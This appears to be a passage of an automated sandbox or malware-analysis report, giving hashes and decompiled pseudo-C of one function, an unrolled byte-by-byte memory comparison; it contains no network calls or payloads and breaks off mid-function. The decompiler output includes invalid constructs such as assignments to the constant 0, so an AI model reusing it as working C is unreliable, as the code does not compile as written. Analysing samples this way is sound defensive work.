                                                                                                                • Opcode ID: a6075f7090f9a60b8c602da68f33975638b429c5d6b1f9f169a5d4623d5fa5c8
                                                                                                                • Instruction ID: df37bff47b6fd1b3b5054d138b8d70c21f5bc54fc6c337dd5c71f3a3c6f14c23
                                                                                                                • Opcode Fuzzy Hash: a6075f7090f9a60b8c602da68f33975638b429c5d6b1f9f169a5d4623d5fa5c8
                                                                                                                • Instruction Fuzzy Hash: D2A002B54101209BEE12DF10CE5C5C93B35FB4938633441D9E4895D035C7228422EA40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004A7B7 Relevance: .5, Instructions: 527COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004A7B7(signed char* _a4, signed char* _a8, signed int _a12) {
				signed int _t984;
				void* _t986;
				signed int _t988;
				void* _t989;
				void* _t991;
				void* _t993;
				void* _t994;
				void* _t996;
				void* _t998;
				void* _t1001;
				void* _t1003;
				void* _t1005;
				signed char* _t1006;
				void* _t1007;
				signed int _t1140;
				signed char* _t1144;
				signed char* _t1145;
				signed char* _t1146;
				signed char* _t1147;
				void* _t1173;
				signed int _t1174;
				void* _t1175;
				signed char* _t1176;
				signed char* _t1177;
				signed char* _t1178;
				void* _t1188;
				void* _t1190;
				void* _t1192;
				void* _t1195;
				void* _t1197;
				void* _t1199;
				void* _t1202;
				void* _t1204;
				void* _t1206;
				void* _t1209;
				void* _t1211;
				void* _t1213;
				void* _t1216;
				void* _t1218;
				void* _t1220;
				void* _t1223;
				void* _t1225;
				void* _t1227;
				void* _t1230;
				void* _t1232;
				void* _t1234;
				void* _t1237;
				void* _t1239;
				void* _t1241;

				_t1174 = _a12;
				_t984 = _t1174;
				if(_t984 == 0) {
					return 0;
				}
				_t986 = _t984 - 1;
				if(_t986 == 0) {
					_t988 =  *_a4 & 0x000000ff;
					_t1140 =  *_a8 & 0x000000ff;
					L426:
					_t989 = _t988 - _t1140;
					if(_t989 == 0) {
						L438:
						return _t989;
					}
					return (0 | _t989 > 0x00000000) + (0 | _t989 > 0x00000000) - 1;
				}
				_t991 = _t986 - 1;
				if(_t991 == 0) {
					_t1144 = _a4;
					_t1176 = _a8;
					_t993 = ( *_t1144 & 0x000000ff) - ( *_t1176 & 0x000000ff);
					if(_t993 == 0) {
						L435:
						_t988 = _t1144[1] & 0x000000ff;
						_t1140 = _t1176[1] & 0x000000ff;
						goto L426;
					}
					_t989 = (0 | _t993 > 0x00000000) + (0 | _t993 > 0x00000000) - 1;
					if(_t989 != 0) {
						goto L438;
					}
					goto L435;
				}
				_t994 = _t991 - 1;
				if(_t994 == 0) {
					_t1145 = _a4;
					_t1177 = _a8;
					_t996 = ( *_t1145 & 0x000000ff) - ( *_t1177 & 0x000000ff);
					if(_t996 == 0) {
						L430:
						_t998 = (_t1145[1] & 0x000000ff) - (_t1177[1] & 0x000000ff);
						if(_t998 == 0) {
							L432:
							_t988 = _t1145[2] & 0x000000ff;
							_t1140 = _t1177[2] & 0x000000ff;
							goto L426;
						}
						_t989 = (0 | _t998 > 0x00000000) + (0 | _t998 > 0x00000000) - 1;
						if(_t989 != 0) {
							goto L438;
						}
						goto L432;
					}
					_t989 = (0 | _t996 > 0x00000000) + (0 | _t996 > 0x00000000) - 1;
					if(_t989 != 0) {
						goto L438;
					}
					goto L430;
				}
				if(_t994 == 1) {
					_t1146 = _a4;
					_t1178 = _a8;
					_t1001 = ( *_t1146 & 0x000000ff) - ( *_t1178 & 0x000000ff);
					if(_t1001 == 0) {
						L421:
						_t1003 = (_t1146[1] & 0x000000ff) - (_t1178[1] & 0x000000ff);
						if(_t1003 == 0) {
							L423:
							_t1005 = (_t1146[2] & 0x000000ff) - (_t1178[2] & 0x000000ff);
							if(_t1005 == 0) {
								L425:
								_t988 = _t1146[3] & 0x000000ff;
								_t1140 = _t1178[3] & 0x000000ff;
								goto L426;
							}
							_t989 = (0 | _t1005 > 0x00000000) + (0 | _t1005 > 0x00000000) - 1;
							if(_t989 != 0) {
								goto L438;
							}
							goto L425;
						}
						_t989 = (0 | _t1003 > 0x00000000) + (0 | _t1003 > 0x00000000) - 1;
						if(_t989 != 0) {
							goto L438;
						}
						goto L423;
					}
					_t989 = (0 | _t1001 > 0x00000000) + (0 | _t1001 > 0x00000000) - 1;
					if(_t989 != 0) {
						goto L438;
					}
					goto L421;
				} else {
					_t1147 = _a8;
					_t1006 = _a4;
					_t1173 = 0x20;
					while(_t1174 >= _t1173) {
						if( *_t1006 ==  *_t1147) {
							_t1175 = 0;
							L16:
							if(_t1175 != 0) {
								L98:
								_t1007 = _t1175;
								L178:
								return _t1007;
							}
							if(_t1006[4] == _t1147[4]) {
								_t1175 = 0;
								L27:
								if(_t1175 != 0) {
									goto L98;
								}
								if(_t1006[8] == _t1147[8]) {
									_t1175 = 0;
									L38:
									if(_t1175 != 0) {
										goto L98;
									}
									if(_t1006[0xc] == _t1147[0xc]) {
										_t1175 = 0;
										L49:
										if(_t1175 != 0) {
											goto L98;
										}
										if(_t1006[0x10] == _t1147[0x10]) {
											_t1175 = 0;
											L60:
											if(_t1175 != 0) {
												goto L98;
											}
											if(_t1006[0x14] == _t1147[0x14]) {
												_t1175 = 0;
												L71:
												if(_t1175 != 0) {
													goto L98;
												}
												if(_t1006[0x18] == _t1147[0x18]) {
													_t1175 = 0;
													L82:
													if(_t1175 != 0) {
														goto L98;
													}
													if(_t1006[0x1c] == _t1147[0x1c]) {
														_t1175 = 0;
														L93:
														if(_t1175 != 0) {
															goto L98;
														} else {
															_t1006 =  &(_t1006[_t1173]);
															_t1147 =  &(_t1147[_t1173]);
															_t1174 = _t1174 - _t1173;
															continue;
														}
													}
													_t1188 = (_t1006[0x1c] & 0x000000ff) - (_t1147[0x1c] & 0x000000ff);
													if(_t1188 == 0) {
														L86:
														_t1190 = (_t1006[0x1d] & 0x000000ff) - (_t1147[0x1d] & 0x000000ff);
														if(_t1190 == 0) {
															L88:
															_t1192 = (_t1006[0x1e] & 0x000000ff) - (_t1147[0x1e] & 0x000000ff);
															if(_t1192 == 0) {
																L90:
																_t1175 = (_t1006[0x1f] & 0x000000ff) - (_t1147[0x1f] & 0x000000ff);
																if(_t1175 != 0) {
																	_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
																}
																goto L93;
															}
															_t1175 = (0 | _t1192 > 0x00000000) + (0 | _t1192 > 0x00000000) - 1;
															if(_t1175 != 0) {
																goto L98;
															}
															goto L90;
														}
														_t1175 = (0 | _t1190 > 0x00000000) + (0 | _t1190 > 0x00000000) - 1;
														if(_t1175 != 0) {
															goto L98;
														}
														goto L88;
													}
													_t1175 = (0 | _t1188 > 0x00000000) + (0 | _t1188 > 0x00000000) - 1;
													if(_t1175 != 0) {
														goto L98;
													}
													goto L86;
												}
												_t1195 = (_t1006[0x18] & 0x000000ff) - (_t1147[0x18] & 0x000000ff);
												if(_t1195 == 0) {
													L75:
													_t1197 = (_t1006[0x19] & 0x000000ff) - (_t1147[0x19] & 0x000000ff);
													if(_t1197 == 0) {
														L77:
														_t1199 = (_t1006[0x1a] & 0x000000ff) - (_t1147[0x1a] & 0x000000ff);
														if(_t1199 == 0) {
															L79:
															_t1175 = (_t1006[0x1b] & 0x000000ff) - (_t1147[0x1b] & 0x000000ff);
															if(_t1175 != 0) {
																_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
															}
															goto L82;
														}
														_t1175 = (0 | _t1199 > 0x00000000) + (0 | _t1199 > 0x00000000) - 1;
														if(_t1175 != 0) {
															goto L98;
														}
														goto L79;
													}
													_t1175 = (0 | _t1197 > 0x00000000) + (0 | _t1197 > 0x00000000) - 1;
													if(_t1175 != 0) {
														goto L98;
													}
													goto L77;
												}
												_t1175 = (0 | _t1195 > 0x00000000) + (0 | _t1195 > 0x00000000) - 1;
												if(_t1175 != 0) {
													goto L98;
												}
												goto L75;
											}
											_t1202 = (_t1006[0x14] & 0x000000ff) - (_t1147[0x14] & 0x000000ff);
											if(_t1202 == 0) {
												L64:
												_t1204 = (_t1006[0x15] & 0x000000ff) - (_t1147[0x15] & 0x000000ff);
												if(_t1204 == 0) {
													L66:
													_t1206 = (_t1006[0x16] & 0x000000ff) - (_t1147[0x16] & 0x000000ff);
													if(_t1206 == 0) {
														L68:
														_t1175 = (_t1006[0x17] & 0x000000ff) - (_t1147[0x17] & 0x000000ff);
														if(_t1175 != 0) {
															_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
														}
														goto L71;
													}
													_t1175 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
													if(_t1175 != 0) {
														goto L98;
													}
													goto L68;
												}
												_t1175 = (0 | _t1204 > 0x00000000) + (0 | _t1204 > 0x00000000) - 1;
												if(_t1175 != 0) {
													goto L98;
												}
												goto L66;
											}
											_t1175 = (0 | _t1202 > 0x00000000) + (0 | _t1202 > 0x00000000) - 1;
											if(_t1175 != 0) {
												goto L98;
											}
											goto L64;
										}
										_t1209 = (_t1006[0x10] & 0x000000ff) - (_t1147[0x10] & 0x000000ff);
										if(_t1209 == 0) {
											L53:
											_t1211 = (_t1006[0x11] & 0x000000ff) - (_t1147[0x11] & 0x000000ff);
											if(_t1211 == 0) {
												L55:
												_t1213 = (_t1006[0x12] & 0x000000ff) - (_t1147[0x12] & 0x000000ff);
												if(_t1213 == 0) {
													L57:
													_t1175 = (_t1006[0x13] & 0x000000ff) - (_t1147[0x13] & 0x000000ff);
													if(_t1175 != 0) {
														_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
													}
													goto L60;
												}
												_t1175 = (0 | _t1213 > 0x00000000) + (0 | _t1213 > 0x00000000) - 1;
												if(_t1175 != 0) {
													goto L98;
												}
												goto L57;
											}
											_t1175 = (0 | _t1211 > 0x00000000) + (0 | _t1211 > 0x00000000) - 1;
											if(_t1175 != 0) {
												goto L98;
											}
											goto L55;
										}
										_t1175 = (0 | _t1209 > 0x00000000) + (0 | _t1209 > 0x00000000) - 1;
										if(_t1175 != 0) {
											goto L98;
										}
										goto L53;
									}
									_t1216 = (_t1006[0xc] & 0x000000ff) - (_t1147[0xc] & 0x000000ff);
									if(_t1216 == 0) {
										L42:
										_t1218 = (_t1006[0xd] & 0x000000ff) - (_t1147[0xd] & 0x000000ff);
										if(_t1218 == 0) {
											L44:
											_t1220 = (_t1006[0xe] & 0x000000ff) - (_t1147[0xe] & 0x000000ff);
											if(_t1220 == 0) {
												L46:
												_t1175 = (_t1006[0xf] & 0x000000ff) - (_t1147[0xf] & 0x000000ff);
												if(_t1175 != 0) {
													_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
												}
												goto L49;
											}
											_t1175 = (0 | _t1220 > 0x00000000) + (0 | _t1220 > 0x00000000) - 1;
											if(_t1175 != 0) {
												goto L98;
											}
											goto L46;
										}
										_t1175 = (0 | _t1218 > 0x00000000) + (0 | _t1218 > 0x00000000) - 1;
										if(_t1175 != 0) {
											goto L98;
										}
										goto L44;
									}
									_t1175 = (0 | _t1216 > 0x00000000) + (0 | _t1216 > 0x00000000) - 1;
									if(_t1175 != 0) {
										goto L98;
									}
									goto L42;
								}
								_t1223 = (_t1006[8] & 0x000000ff) - (_t1147[8] & 0x000000ff);
								if(_t1223 == 0) {
									L31:
									_t1225 = (_t1006[9] & 0x000000ff) - (_t1147[9] & 0x000000ff);
									if(_t1225 == 0) {
										L33:
										_t1227 = (_t1006[0xa] & 0x000000ff) - (_t1147[0xa] & 0x000000ff);
										if(_t1227 == 0) {
											L35:
											_t1175 = (_t1006[0xb] & 0x000000ff) - (_t1147[0xb] & 0x000000ff);
											if(_t1175 != 0) {
												_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
											}
											goto L38;
										}
										_t1175 = (0 | _t1227 > 0x00000000) + (0 | _t1227 > 0x00000000) - 1;
										if(_t1175 != 0) {
											goto L98;
										}
										goto L35;
									}
									_t1175 = (0 | _t1225 > 0x00000000) + (0 | _t1225 > 0x00000000) - 1;
									if(_t1175 != 0) {
										goto L98;
									}
									goto L33;
								}
								_t1175 = (0 | _t1223 > 0x00000000) + (0 | _t1223 > 0x00000000) - 1;
								if(_t1175 != 0) {
									goto L98;
								}
								goto L31;
							}
							_t1230 = (_t1006[4] & 0x000000ff) - (_t1147[4] & 0x000000ff);
							if(_t1230 == 0) {
								L20:
								_t1232 = (_t1006[5] & 0x000000ff) - (_t1147[5] & 0x000000ff);
								if(_t1232 == 0) {
									L22:
									_t1234 = (_t1006[6] & 0x000000ff) - (_t1147[6] & 0x000000ff);
									if(_t1234 == 0) {
										L24:
										_t1175 = (_t1006[7] & 0x000000ff) - (_t1147[7] & 0x000000ff);
										if(_t1175 != 0) {
											_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
										}
										goto L27;
									}
									_t1175 = (0 | _t1234 > 0x00000000) + (0 | _t1234 > 0x00000000) - 1;
									if(_t1175 != 0) {
										goto L98;
									}
									goto L24;
								}
								_t1175 = (0 | _t1232 > 0x00000000) + (0 | _t1232 > 0x00000000) - 1;
								if(_t1175 != 0) {
									goto L98;
								}
								goto L22;
							}
							_t1175 = (0 | _t1230 > 0x00000000) + (0 | _t1230 > 0x00000000) - 1;
							if(_t1175 != 0) {
								goto L98;
							}
							goto L20;
						}
						_t1237 = ( *_t1006 & 0x000000ff) - ( *_t1147 & 0x000000ff);
						if(_t1237 == 0) {
							L9:
							_t1239 = (_t1006[1] & 0x000000ff) - (_t1147[1] & 0x000000ff);
							if(_t1239 == 0) {
								L11:
								_t1241 = (_t1006[2] & 0x000000ff) - (_t1147[2] & 0x000000ff);
								if(_t1241 == 0) {
									L13:
									_t1175 = (_t1006[3] & 0x000000ff) - (_t1147[3] & 0x000000ff);
									if(_t1175 != 0) {
										_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
									}
									goto L16;
								}
								_t1175 = (0 | _t1241 > 0x00000000) + (0 | _t1241 > 0x00000000) - 1;
								if(_t1175 != 0) {
									goto L98;
								}
								goto L13;
							}
							_t1175 = (0 | _t1239 > 0x00000000) + (0 | _t1239 > 0x00000000) - 1;
							if(_t1175 != 0) {
								goto L98;
							}
							goto L11;
						}
						_t1175 = (0 | _t1237 > 0x00000000) + (0 | _t1237 > 0x00000000) - 1;
						if(_t1175 != 0) {
							goto L98;
						}
						goto L9;
					}
					if(_t1174 > 0x1f) {
						L177:
						_t1007 = 0;
						goto L178;
					}
					switch( *((intOrPtr*)(_t1174 * 4 +  &M1004BDB7))) {
						case 0:
							goto L177;
						case 1:
							L256:
							__ecx =  *(__ecx - 1) & 0x000000ff;
							__eax =  *(__eax - 1) & 0x000000ff;
							__eax = __eax - __ecx;
							if(__eax != 0) {
								0 = 0 | __eax > 0x00000000;
								__ecx = (__eax > 0) + (__eax > 0) - 1;
								__eax = (__eax > 0) + (__eax > 0) - 1;
							}
							goto L178;
						case 2:
							L335:
							if( *(__eax - 2) ==  *(__ecx - 2)) {
								goto L177;
							}
							goto L336;
						case 3:
							L416:
							__esi =  *(__eax - 3) & 0x000000ff;
							__edx =  *(__ecx - 3) & 0x000000ff;
							__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
							if(__esi == 0) {
								L336:
								__edx =  *(__ecx - 2) & 0x000000ff;
								__esi =  *(__eax - 2) & 0x000000ff;
								__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
								if(__esi == 0) {
									goto L256;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								if(__edx != 0) {
									L418:
									__eax = __edx;
									goto L178;
								}
								goto L256;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							if(__edx == 0) {
								goto L336;
							}
							goto L418;
						case 4:
							L165:
							__edx =  *(__eax - 4);
							if( *(__eax - 4) ==  *(__ecx - 4)) {
								__eax = 0;
								L176:
								if(__eax != 0) {
									goto L178;
								}
								goto L177;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 4) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
							if(__esi == 0) {
								L168:
								__esi =  *(__eax - 3) & 0x000000ff;
								__edx =  *(__ecx - 3) & 0x000000ff;
								__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
								if(__esi == 0) {
									L170:
									__esi =  *(__eax - 2) & 0x000000ff;
									__edx =  *(__ecx - 2) & 0x000000ff;
									__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
									if(__esi == 0) {
										L173:
										__eax =  *(__eax - 1) & 0x000000ff;
										__eax = __eax - __ecx;
										if(__eax != 0) {
											0 = 0 | __eax > 0x00000000;
											__ecx = (__eax > 0) + (__eax > 0) - 1;
											__eax = (__eax > 0) + (__eax > 0) - 1;
										}
										goto L176;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									if(__edx == 0) {
										goto L173;
									}
									L172:
									__eax = __edx;
									goto L176;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								if(__edx != 0) {
									goto L172;
								}
								goto L170;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							if(__edx != 0) {
								goto L172;
							}
							goto L168;
						case 5:
							L245:
							__edx =  *(__eax - 5);
							if( *(__eax - 5) ==  *(__ecx - 5)) {
								__esi = 0;
								L255:
								if(__esi != 0) {
									goto L98;
								}
								goto L256;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 5) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
							if(__esi == 0) {
								L248:
								__esi =  *(__eax - 4) & 0x000000ff;
								__edx =  *(__ecx - 4) & 0x000000ff;
								__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
								if(__esi == 0) {
									L250:
									__esi =  *(__eax - 3) & 0x000000ff;
									__edx =  *(__ecx - 3) & 0x000000ff;
									__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
									if(__esi == 0) {
										L252:
										__esi =  *(__eax - 2) & 0x000000ff;
										__edx =  *(__ecx - 2) & 0x000000ff;
										__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L255;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L252;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L250;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L248;
						case 6:
							L324:
							__edx =  *(__eax - 6);
							if( *(__eax - 6) ==  *(__ecx - 6)) {
								__esi = 0;
								L334:
								if(__esi != 0) {
									goto L98;
								}
								goto L335;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 6) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
							if(__esi == 0) {
								L327:
								__esi =  *(__eax - 5) & 0x000000ff;
								__edx =  *(__ecx - 5) & 0x000000ff;
								__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
								if(__esi == 0) {
									L329:
									__esi =  *(__eax - 4) & 0x000000ff;
									__edx =  *(__ecx - 4) & 0x000000ff;
									__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
									if(__esi == 0) {
										L331:
										__esi =  *(__eax - 3) & 0x000000ff;
										__edx =  *(__ecx - 3) & 0x000000ff;
										__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L334;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L331;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L329;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L327;
						case 7:
							L405:
							__edx =  *(__eax - 7);
							if( *(__eax - 7) ==  *(__ecx - 7)) {
								__esi = 0;
								L415:
								if(__esi != 0) {
									goto L98;
								}
								goto L416;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 7) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
							if(__esi == 0) {
								L408:
								__esi =  *(__eax - 6) & 0x000000ff;
								__edx =  *(__ecx - 6) & 0x000000ff;
								__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
								if(__esi == 0) {
									L410:
									__esi =  *(__eax - 5) & 0x000000ff;
									__edx =  *(__ecx - 5) & 0x000000ff;
									__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
									if(__esi == 0) {
										L412:
										__esi =  *(__eax - 4) & 0x000000ff;
										__edx =  *(__ecx - 4) & 0x000000ff;
										__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L415;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L412;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L410;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L408;
						case 8:
							L154:
							__edx =  *(__eax - 8);
							if( *(__eax - 8) ==  *(__ecx - 8)) {
								__esi = 0;
								L164:
								if(__esi != 0) {
									goto L98;
								}
								goto L165;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 8) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
							if(__esi == 0) {
								L157:
								__esi =  *(__eax - 7) & 0x000000ff;
								__edx =  *(__ecx - 7) & 0x000000ff;
								__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
								if(__esi == 0) {
									L159:
									__esi =  *(__eax - 6) & 0x000000ff;
									__edx =  *(__ecx - 6) & 0x000000ff;
									__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
									if(__esi == 0) {
										L161:
										__esi =  *(__eax - 5) & 0x000000ff;
										__edx =  *(__ecx - 5) & 0x000000ff;
										__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L164;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L161;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L159;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L157;
						case 9:
							L234:
							__edx =  *(__eax - 9);
							if( *(__eax - 9) ==  *(__ecx - 9)) {
								__esi = 0;
								L244:
								if(__esi != 0) {
									goto L98;
								}
								goto L245;
							}
							__edx =  *(__ecx - 9) & 0x000000ff;
							__esi =  *(__eax - 9) & 0x000000ff;
							__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
							if(__esi == 0) {
								L237:
								__esi =  *(__eax - 8) & 0x000000ff;
								__edx =  *(__ecx - 8) & 0x000000ff;
								__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
								if(__esi == 0) {
									L239:
									__esi =  *(__eax - 7) & 0x000000ff;
									__edx =  *(__ecx - 7) & 0x000000ff;
									__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
									if(__esi == 0) {
										L241:
										__esi =  *(__eax - 6) & 0x000000ff;
										__edx =  *(__ecx - 6) & 0x000000ff;
										__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L244;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L241;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L239;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L237;
						case 0xa:
							L313:
							__edx =  *(__eax - 0xa);
							if( *(__eax - 0xa) ==  *(__ecx - 0xa)) {
								__esi = 0;
								L323:
								if(__esi != 0) {
									goto L98;
								}
								goto L324;
							}
							__edx =  *(__ecx - 0xa) & 0x000000ff;
							__esi =  *(__eax - 0xa) & 0x000000ff;
							__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
							if(__esi == 0) {
								L316:
								__edx =  *(__ecx - 9) & 0x000000ff;
								__esi =  *(__eax - 9) & 0x000000ff;
								__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
								if(__esi == 0) {
									L318:
									__edx =  *(__ecx - 8) & 0x000000ff;
									__esi =  *(__eax - 8) & 0x000000ff;
									__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
									if(__esi == 0) {
										L320:
										__edx =  *(__ecx - 7) & 0x000000ff;
										__esi =  *(__eax - 7) & 0x000000ff;
										__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L323;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L98;
									}
									goto L320;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L98;
								}
								goto L318;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L98;
							}
							goto L316;
						case 0xb:
							L394:
							__edx =  *(__eax - 0xb);
							if( *(__eax - 0xb) ==  *(__ecx - 0xb)) {
								__esi = 0;
								L404:
								if(__esi != 0) {
									goto L98;
								}
								goto L405;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xb) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
							if(__esi == 0) {
								L397:
								__esi =  *(__eax - 0xa) & 0x000000ff;
								__edx =  *(__ecx - 0xa) & 0x000000ff;
								__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
								if(__esi == 0) {
									L399:
									__esi =  *(__eax - 9) & 0x000000ff;
									__edx =  *(__ecx - 9) & 0x000000ff;
									__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
									if(__esi == 0) {
										L401:
										__esi =  *(__eax - 8) & 0x000000ff;
										__edx =  *(__ecx - 8) & 0x000000ff;
										__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L404;
